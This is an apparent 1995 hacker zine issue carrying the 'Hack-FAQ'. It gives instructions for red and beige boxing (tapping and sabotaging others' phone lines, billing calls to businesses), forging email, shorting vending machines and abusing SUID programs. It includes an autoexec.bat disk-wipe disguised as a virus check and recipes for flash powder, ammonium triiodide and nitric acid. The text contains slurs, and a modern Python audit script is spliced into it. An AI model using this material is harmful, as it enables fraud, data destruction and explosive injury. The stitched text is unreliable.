* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, October, 1995

Edited by: Revolution

Table Of Contents

From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
The Hack-FAQ 2.06 . . . . . . . . . . . . . . . . . . Belisarius and N P
The Pursuit of Knowledge, Notes on the Guild . . . . . . . . . . . . Route
The LACC Mailing List . . . . . . . . . . . . . . . . . . Julian Assange
2600 Meetings . . . . . . . . . . . . . . . . . . . . . . . . . . FuSIoN
Billwatch #18 . . . . . . . . . . . . . . Voters Telecommunications Watch
A VMS Login Spoof . . . . . . . . . . . . . . . . . . . . . . Talonphish
Remote Host Probing . . . . . . . . . . . . . . . . . . . . . . . IOERROR
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution

----------------------------------------------------------------------------

copyright 1995 by Mike Scanlon

All articles remain the property of their authors, and may be reprinted with their permission. This zine may be reprinted freely as a whole electronically, for hard copy rights mail the editor. HACKERS is published monthly by Mike Scanlon, to be added to the subscription list or to submit articles mail scanlonr@delphi.com

----------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #1 of 9

From the Editor

An amazing amount of things have gone on here at Hackers since last issue. I started college at NJIT, so you might notice that this issue is coming from a different address. I've kept my email address the same for the time being, although if you send anything to mrs3691@hertz.njit.edu I will receive it also. Hackers has a new web page up, where issues are now browsable in html form at http://hertz.njit.edu/~mrs3691. There are no graphics up as of yet, so don't expect anything much. NJIT is located in Newark, New Jersey, so I'm local to all of NYC. If any of you attend the 2600 meetings in the Citicorp building, plan on seeing me there in the future. Alas, due to the increased workload, I've had to diminish my net presence in recent weeks, but as I adjust I'll probably be on a little more. In the near future, in fact, my comp sci class might set up a telnetable BBS, so look for some cool things from that.

When I started this issue, I thought it might suffer because I did not have enough time to put into it, but a few good submissions turned that around. This month we have an essay on the guild from its founding member, a login spoof you can use with last month's VMS hacking article, and a couple other cool articles. The Hack-FAQ, although a good source of info for beginning hackers, is more of a sentimental article due to some things that have been happening in the old ISCA crowd, such as the return of its editor to the scene, and the prospective return of a few other old friends.

Also, I'd like to take this chance to recommend everyone to subscribe to Billwatch. Although issues of it have been cropping up in here for the last few issues, if this is your only source of it, you are missing some very good information. This issue it has some very good info on the state of the cryptography debate, which I think everybody should take at least a glance at, so I decided to include it once again.

Anyway, as always I've got to go and do some homework, so I hope you like this issue.

- Revolution

* * * * * * * * * * * * * * * * * * * *

As always, the standard disclaimer applies. All of these articles are provided for informational purposes only, Mike Scanlon and the respective authors cannot be held accountable for any illegal acts they are used to commit.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #2 of 9

+---------------+
| THE HACK-FAQ! |
| Edition 2.06  |
| 14 FEB 1994   |
+---------------+

"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop

<*> Edited by <*>

# Editor-in-Chief #
Belisarius

# Asst. Editor #
Neurophire (on Shadow and N P on ISCA)

A MatrixMage Electronic Publication

With help from some members of KARMA/K.R.A.

Special Thanks to the Following Contributors:

Z Maestro
RA of ISCA Underground>
DINO
RA of Shadow Hack and Crack>
Artimage
RA of SKYNET Underground>

Faunus, Revolution, Matrixx, Amarand, Beelzebub, Redbeard, IO, CyberSorceror, Doktor Nil, Skipster, CPT Ozone, Abort, Carsenio

Hi there, Hackers and Newbies alike! We have compiled this, THE HACK-FAQ!, for all of you out there. Please if you have any suggestions, contributions, criticisms, whatever, mail at the above addresses. You might be wondering...where did edition 2.05 go? Well before I could get it out I got in a lot more good shit and decided to update it again before sending it out.

To receive a copy of THE HACK-FAQ! via E-mail then send E-mail to me at the address above. THE HACK-FAQ! is a roughly monthly update and I am currently looking for a site with LISTSERV capabilities.

Thanks and keep hacking! Remember to keep working and to always try to educate yourself and gather information. If you're a newbie then read THE HACK-FAQ! first and use it as a springboard to start from. If you're a hacker then please contribute to this document.

-=> Belisarius <=-

Hey, to the CrackerJack crowd, keep struggling!! You can make it above, that's what I am beginning to do! There is hope! :)

])> Neurophyre <([

Distribution of THE HACK-FAQ! is encouraged and promoted, as long as it is distributed as the entire file. Keep up with latest editions. Look for the latest edition of THE HACK-FAQ! in every KARMA/K.R.A. Irregular Zine.

THE HACK-FAQ! is (c) of MatrixMage(tm) Publications. MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences.
You use this information at your own risk. ***************************************************************** **** CONTENTS Sections I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc) II. Fake E-Mail III. Salting Vending Machines IV. Explosives V. Virii VI. UNIX Passwords VII. Phucking with MS-DOS VIII. Cracking programs IX. PGP / Data Encryption X. Chemistry (drugs and explosive/pyrotechnic component prep) XI. 'Cyberpunk'/Futuristic/Underground Culture Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Catalogs E. PGP Key Appendix ***************************************************************** **** ================================================================= ==== I. Phone Fun WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 Mhz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 Mhz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 Mhz crystal. 
It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 Mhz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ----------------------------------------------------------------- ---- WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ----------------------------------------------------------------- ---- WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? 
(from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ----------------------------------------------------------------- ---- WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ----------------------------------------------------------------- ---- WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *s Here are the freq's for a red box: $.25 1700Hz & 2200Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700Hz & 2200Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freq's for 66 milliseconds! ----------------------------------------------------------------- ---- HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ----------------------------------------------------------------- ---- FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ----------------------------------------------------------------- ---- HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. 
Cut off the head on one end of the phone cord. 2. Strip the coating. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a retard, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the scored [the "screwy end"] end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ----------------------------------------------------------------- ---- BEIGE BOXING 101 Phield Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and phry a phreak" it dosen't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this phile to whoever the fuck you want, just make sure it all stays together, same title, same byline. Phield phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hitek revenge, anything you can do from your own fone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your fone cord before the jak, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. 
If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's fone cord? Just unscrew a jak from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a fone, laptop, your mom, anything you can plug in a jak.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on fone poles, where your fone line meets your house, and near payfones. I'll go into detail below, but basically just open any box on a telefone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a fone jak. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just phuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telefone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one fone line. These are the fist sized gray or black boxes that appear where a single fone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their fone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. 
These are the 3 foot high green/gray metal columns that are no wider than a telefone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of fone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from phriends and some social engineering, I learned that inside is where two underground fone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to fone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. 
They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6x4, attached to a telefone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 fones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 fones the box connects too). On houses: follow the fone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payfones: follow the fone line up from the fone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little fone jak. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there'll be a sw. ap. like those on houses (see above). Payfones are normally pretty secure now though, and you probably won't find any of those. 
Phreaky things you can do: Jesus, do I have to tell you L/-\m3rs everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hitek revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to 3l33+ for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something alot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telefone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two termianls with a paper clip, alligator clip, even your mother's pussylips! His fone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (asshole's #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, email revolution@delphi.com no PGP needed. ----------------------------------------------------------------- ---- HOW CAN YOU INTERCEPT CELLULAR PHONE CONVERSATIONS? (from CPT Ozone) You can intercept most cellular phone signals on any old radio that pulls in police and air bands? Look for them at garage sales and junk yards. ----------------------------------------------------------------- ---- WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... 
a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ----------------------------------------------------------------- ---- HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to chhose the number of ports for your conference call, and how to dial each participant.. ================================================================= ==== II. Fake E-mail HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL SMTP)? (from Beelzebub, Doktor Nil) 1. Telnet to port 25 of any internet server (eg oberlin.edu 25) 2. If at all possible, AVOID TYPING "HELO". Type mail from:(fake name) 3. Type rcpt to:(person who gets mail) 4. The mail server should ok each time after each name. 5. If it does not: a) type vrfy and then the name of the person b) as a last resort use helo, this will login your computer as having been the source of the mail 6. Retype the commands, it should say ok now. 7. Type data 8. Enter your letter 9. To send letter type a "." on an empty line. 10. Then type quit 11. This is traceable by any sysadmin ... don't harass people this way. 12. If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway. 13. 
Make sure you use a four part address somebody@part1.pt2.pt3.pt4 so as to make it look more believable and cover any addons the mail routine might try 14. Put a realistic mail header in the mail message to throw people off even more. If there are To: and Date: lines then the program probably won't add them on. 15. Also try to telnet to the site where the recipient has his account. This works better if you know how to fool it. ================================================================= ==== III. Salting vending machines WHAT DOES SALTING VENDING MACHINES DO? When you take concentrated salt water (a high concentration of salt) and squirt it into the change slot (preferably where the dollar bills come in, though some say it doesn't matter), the salt will short circuit the machine and out will pour change and hopefully sodas. ================================================================= ==== IV. Explosives FLASH POWDERS: (from Neurophyre) Materials: Powdered magnesium, powdered potassium nitrate 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium nitrate. 2. Light it with a long fuse cuz its so bright it might screw up your eyes. REAL Cherry Bomb Powder 4 parts by weight of potassium perchlorate 1 part by weight of antimony trisulfide (if you can find 1 part by weight aluminum powder regular antimony sulfide contact Neurophyre!) Relatively Safe 3 parts by weight of potassium permanganate 2 parts by weight of aluminum powder *VERY* Shock/Friction/Static/Heat Sensitive! Use only if suicidal or desperate! 4 parts by weight of potassium chlorate 1 part by weight of sulfur 1 part by weight of aluminum powder 1) To use these mixtures, SEPARATELY pulverize each ingredient into a fine powder, the finer it is, the more power you get. Use a mortar and pestle if available, and grind GENTLY. Do not use plastic as this can build a static charge. Remember, do them SEPARATELY. 
----------------------------------------------------------------- ---- AMATEUR EXPLOSIVE (Ammonium Triiodide): (from IO) WARNING: This explosive is EXTREMELY shock sensitive when dry, and moderately sensitive when wet!!! AVOID IT when dry! DO NOT store! The purplish iodine vapor this produces during the explosion will stain and corrode! 1) Take a small plastic bucket, add 3-4 inches of household ammonia. This bucket will never be clean again, in all likelihood. Try to get clear (non-pine, non-cloudy) ammonia. Or use an ammonium hydroxide solution from a chemlab. This results in better but more sensitive, and therefore dangerous crystals. 2) Drop in iodine (like you use on scratches) one drop at a time, or, preferably, use crystals of iodine. 3) Let it settle, then pour it through a piece of cloth, discarding the runoff. 4) Squeeze *gently* to get out excess liquid. 5) Mold it onto the thing you want to blow up, stand **way** back. 6) Wait for it to dry, and throw a rock at it. ================================================================= ==== V. Virii WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] You can't get busted for anything having to do with this BBS. Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. 
---------------------------------------------------------------------

INTS USED:
(from Belisarius)

You want Int 18h, AH=03h,

    AL==Num sectors to write
    BX==offset of pointer to buffer
    CH=cylinder Number
    CL=sector number
    DX=head number
    DL=drive numbers
    ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number (high 2 bits), 0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive

upon return: AH=status, AL=number of sectors written, flags, carry set if an error.

=====================================================================

VI. Unix

HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)

The password file is usually called /etc/passwd

Each line of the passwd file of a UNIX system follows the following format:

    userid:password:userid#:groupid#:GECOS field:home dir:shell

What each of these fields means/does---

userid      -=> the userid name, entered at login and is what the login searches the file for. Can be a name or a number.

password    -=> the password is written here in encrypted form. The encryption is one way only. When a login occurs the password entered is run thru the encryption algorithm (along with a salt) and then contrasted to the version in the passwd file that exists for the login name entered. If they match, then the login is allowed. If not, the password is declared invalid.

userid#     -=> a unique number assigned to each user, used for permissions

groupid#    -=> similar to userid#, but controls the group the user belongs to. To see the names of various groups check /etc/group

GECOS FIELD -=> this field is where information about the user is stored. Usually in the format full name, office number, phone number, home phone. Also a good source of info to try and crack a password.

home dir    -=> is the directory where the user goes into the system at (and usually should be brought to when a cd is done)

shell       -=> this is the name of the shell which is automatically started for the login

Note that all the fields are separated by colons in the passwd file.

---------------------------------------------------------------------

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)

Those mean that the password is shadowed in another file. You have to find out what file, where it is and so on. Ask somebody on your system about the specifics of the Yellow Pages system, but discreetly!

---------------------------------------------------------------------

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)

Tripwire is a tool for Unix admins to use to detect password cracker activity, by checking for changed files, permissions, etc. Good for looking for trojan horses like password stealing versions of telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)

A SUID program is a program that when executed has the privs of the owner. A GUID has the privs of the group when executed. Now imagine a few things (which happen often in reality):

1. Someone has a SUID program on their account, it happens to allow a shell to, like @ or jump to a shell. If it does that, after you execute said file and then spawn a shell off of it, all you do in that shell has the privs of that owner.

2. If there is no way to get a shell, BUT they leave the file writable, just write over it a script that spawns a shell, and you got their privs again.

=====================================================================

VII. Phucking with MS-DOS

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)

Install a small program (in the Dos directory would be good) called Wipe, by Norton Utilities. I am pretty sure that executing this program, using the proper command line options, you can go one better than formatting the hard drive. Wiping the information changes each bit in the object (file, FAT, disk, hard drive) to a zero...or a random bit, or an alternating bit instead of just deleting the reference to it in the file allocation table. If you just delete a file, or format a hard drive...with the new Dos you would only need to let it run its course and then Unformat the drive. Wipe, I have found, works much more effectively by first erasing the file allocation table AFTER erasing the information the file allocation table is used to find.

---------------------------------------------------------------------

WRITING A .bat FILE TO 'WIPE' A DRIVE.

Add the following code to the end of autoexc.bat:

    echo Please wait
    echo Checking HardDisk for virii, this make take a while ...
    wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================

VIII. Cracking Programs

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)

There are three main cracking programs. They are Crack, Cracker Jack and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3 runs on any x86 class and CJack1.4 needs at least a 386. To use any of these requires access to an unshadowed password file. They are not programs that try to login to an account. They take the password file (/etc/passwd in UNIX is usually the name) and guess the passwords.

---------------------------------------------------------------------

WHERE CAN I GET THESE PROGRAMS?
(from Redbeard)

Crack, CrackerJack, and COPS at ftp plaza.aarnet.edu.au in the /secutiry/cert directory

WHAT IS WPCRACK?

WPCRAK is a cracker to break the encryption on WordPerfect files. It works, but takes a long time to run.
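
An added example, not part of the original FAQ: a defender-side audit of passwd-format lines, using the seven fields described in section VI. It flags what the cracking programs above depend on (hashes left in the world-readable passwd file), plus empty password fields, extra userid# 0 accounts and GECOS details; the sample entries, finding codes and placeholder set are constructed assumptions.

```python
"""Audit passwd-format lines for the weaknesses the FAQ text points at."""
from dataclasses import dataclass

# Constructed sample in the seven-field layout; the account names and the
# hash-like string are made up for this example.
SAMPLE_PASSWD = """\
root:x:0:0:Super User:/root:/bin/sh
alice:Ab3dEfGhIjK1M:101:20:Alice Example,Rm 12,555-0100:/home/alice:/bin/csh
bob::102:20:Bob Example:/home/bob:/bin/sh
toor:x:0:0:Backup root:/root:/bin/sh
daemon:*:1:1:System daemon:/:/sbin/nologin
carol:!:103:20:Carol Example:/home/carol:/bin/sh
broken-line-without-enough-fields:x:104
"""

# Assumed placeholder set: values meaning "no hash stored in this file"
# (password shadowed elsewhere, or the account is locked).
PLACEHOLDERS = {"x", "*", "!", "!!"}

DESCRIPTIONS = {
    "UNSHADOWED_HASH": "hash readable by every user; exposed to offline guessing",
    "EMPTY_PASSWORD": "empty password field; login may need no password",
    "EXTRA_UID0": "account other than root carries userid# 0",
    "GECOS_DETAILS": "GECOS holds office/phone details useful for guessing",
}


@dataclass
class Entry:
    userid: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Return (entries, malformed); malformed holds 1-based line numbers."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        # Exactly seven colon-separated fields, numeric userid# and groupid#.
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(lineno)
            continue
        userid, password, uid, gid, gecos, home, shell = fields
        entries.append(Entry(userid, password, int(uid), int(gid), gecos, home, shell))
    return entries, malformed


def audit(entries):
    """Return (userid, finding_code) tuples in file order."""
    findings = []
    for e in entries:
        if e.password == "":
            findings.append((e.userid, "EMPTY_PASSWORD"))
        elif e.password not in PLACEHOLDERS:
            findings.append((e.userid, "UNSHADOWED_HASH"))
        if e.uid == 0 and e.userid != "root":
            findings.append((e.userid, "EXTRA_UID0"))
        # Anything after the full name (office, phone numbers) counts as detail.
        extras = [part for part in e.gecos.split(",")[1:] if part.strip()]
        if extras:
            findings.append((e.userid, "GECOS_DETAILS"))
    return findings


if __name__ == "__main__":
    parsed, bad_lines = parse_passwd(SAMPLE_PASSWD)
    for userid, code in audit(parsed):
        print(f"{userid:8} {code:16} {DESCRIPTIONS[code]}")
    for lineno in bad_lines:
        print(f"line {lineno}: malformed entry, review by hand")
```
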
---------------------------------------------------------------------

WHAT IS PKCRACK?

PKCRACK is a dictionary cracker for PKZIP. It works. It's dictionary,
but it works. Not all that well, as you may have to sift through
multiple possible passwords, but it's better than nothing. Look for it
at ftp plains.nodak.edu

=====================================================================

IX. PGP / Data Encryption

WHAT IS PGP?
(from Belisarius)

PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS, Unix,
and Mac. You create a key pair. One private (secret) key and a public
key. The keys are different parts of the whole. I distribute my public
key and anyone who wants can grab it, add it to their PGP keyring. Then
when they want to send me a message they encrypt it with PGP and my
public key and then send it. Only I can decrypt it because you need my
secret key to decode it. (Trust me you won't get my secret key) That is
PGP. Please use it if you want to communicate anything of a
ahhhh....sensitive manner.

---------------------------------------------------------------------

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
--------------------------------------------------------------

========
Unix PGP
========

Host 130.149.17.7
    Location: /pub/local/ini/security
        FILE -rw-rw-r--   651826  Apr  5 1993   pgp22.tar.Z

Host arthur.cs.purdue.edu
    Location: /pub/pcert/tools/unix/pgp
        FILE -r--r--r--   651826  Mar  7 1993   pgp22.tar.Z

Host coombs.anu.edu.au
    Location: /pub/security/cypher
        FILE -r--r--r--   651826  Nov  4 22:28  pgp22.tar.Z

Host dutepp0.et.tudelft.nl
    Location: /pub/Unix/Security
        FILE -rw-rw-r--   651826  Oct  4 12:40  pgp22.tar.Z

Host isy.liu.se
    Location: /pub/misc/pgp/2.2
        FILE -rw-r--r--   651826  Mar 10 1993   pgp22.tar.Z

Host lhc.nlm.nih.gov
    Location: /pub/hunter
        FILE -rw-r--r--   651826  Jun 30 00:00  pgp22.tar.Z

==========
MS-DOS PGP
==========

Host zero.cypher.com
    Location: /pub/pgp
        FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
    Location: /pcsoft/msdos/security
        FILE -rw-r--r--    65160  Aug  9 20:00  pgpshe22.zip

Host nic.switch.ch
    Location: /mirror/msdos/security
        FILE -rw-rw-r--    65160  Aug  9 22:00  pgpshe22.zip

Host pc.usl.edu
    Location: /pub/msdos/crypto
        FILE -rw-r--r--    65160  Sep  1 15:42  pgpshe22.zip

Host plains.nodak.edu
    Location: /pub/aca/msdos/pgp
        FILE -rw-r--r--    65430  Nov 26 18:28  pgpshe22.zip

Host plaza.aarnet.edu.au
    Location: /micros/pc/garbo/pc/crypt
        FILE -r--r--r--    65430  Aug  3 11:40  pgpshe22.zip
    Location: /micros/pc/oak/security
        FILE -r--r--r--    65160  Aug  9 20:00  pgpshe22.zip

=======
Mac PGP
=======

Host plaza.aarnet.edu.au
    Location: /micros/mac/info-mac/util
        FILE -r--r--r--   323574  Apr 26 1993   pgp.hqx

Host sics.se
    Location: /pub/info-mac/util
        FILE -rw-rw-r--   323574  Nov  5 11:20  pgp.hqx

Host sumex-aim.stanford.edu
    Location: /info-mac/util
        FILE -rw-r--r--   323574  Apr 26 1993   pgp.hqx

=====================================================================

X.
CHEMISTRY (from Neurophire) /*\*/*\*/*\*/*\*/*\*/*\*/ COMING SOON /*\*/*\*/*\*/*\*/*\*/*\*/ How to cheaply make Potassium Chlorate! Easily! KClO3 is an ingredient in some plastic explosives and in unstable flash powders, as well as incendiary powders, bricks, and quick and dirty smoke mix! HOW TO MAKE NITRIC ACID: Nitric acid is not TOO expensive, but is hard to find except from chemical supply houses. Purchases can be traced.(From TBBOM13.TXT) There are several ways to make this most essential of all acids for explosives. One method by which it could be made will be presented. again, be reminded that these methods SHOULD NOT BE CARRIED OUT!! Materials: Equipment: ---------- ---------- sodium nitrate or adjustable heat source potassium nitrate retort distilled water ice bath concentrated sulfuric acid stirring rod collecting flask with stopper 1) Pour 32 milliliters of concentrated sulfuric acid into the retort. 2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium nitrate. and add this to the acid slowly. If it all does not dissolve, carefully stir the solution with a glass rod until it does. 3) Place the open end of the retort into the collecting flask, and place the collecting flask in the ice bath. 4) Begin heating the retort, using low heat. Continue heating until liquid begins to come out of the end of the retort. The liquid that forms is nitric acid. Heat until the precipitate in the bottom of the retort is almost dry, or until no more nitric acid is forming. 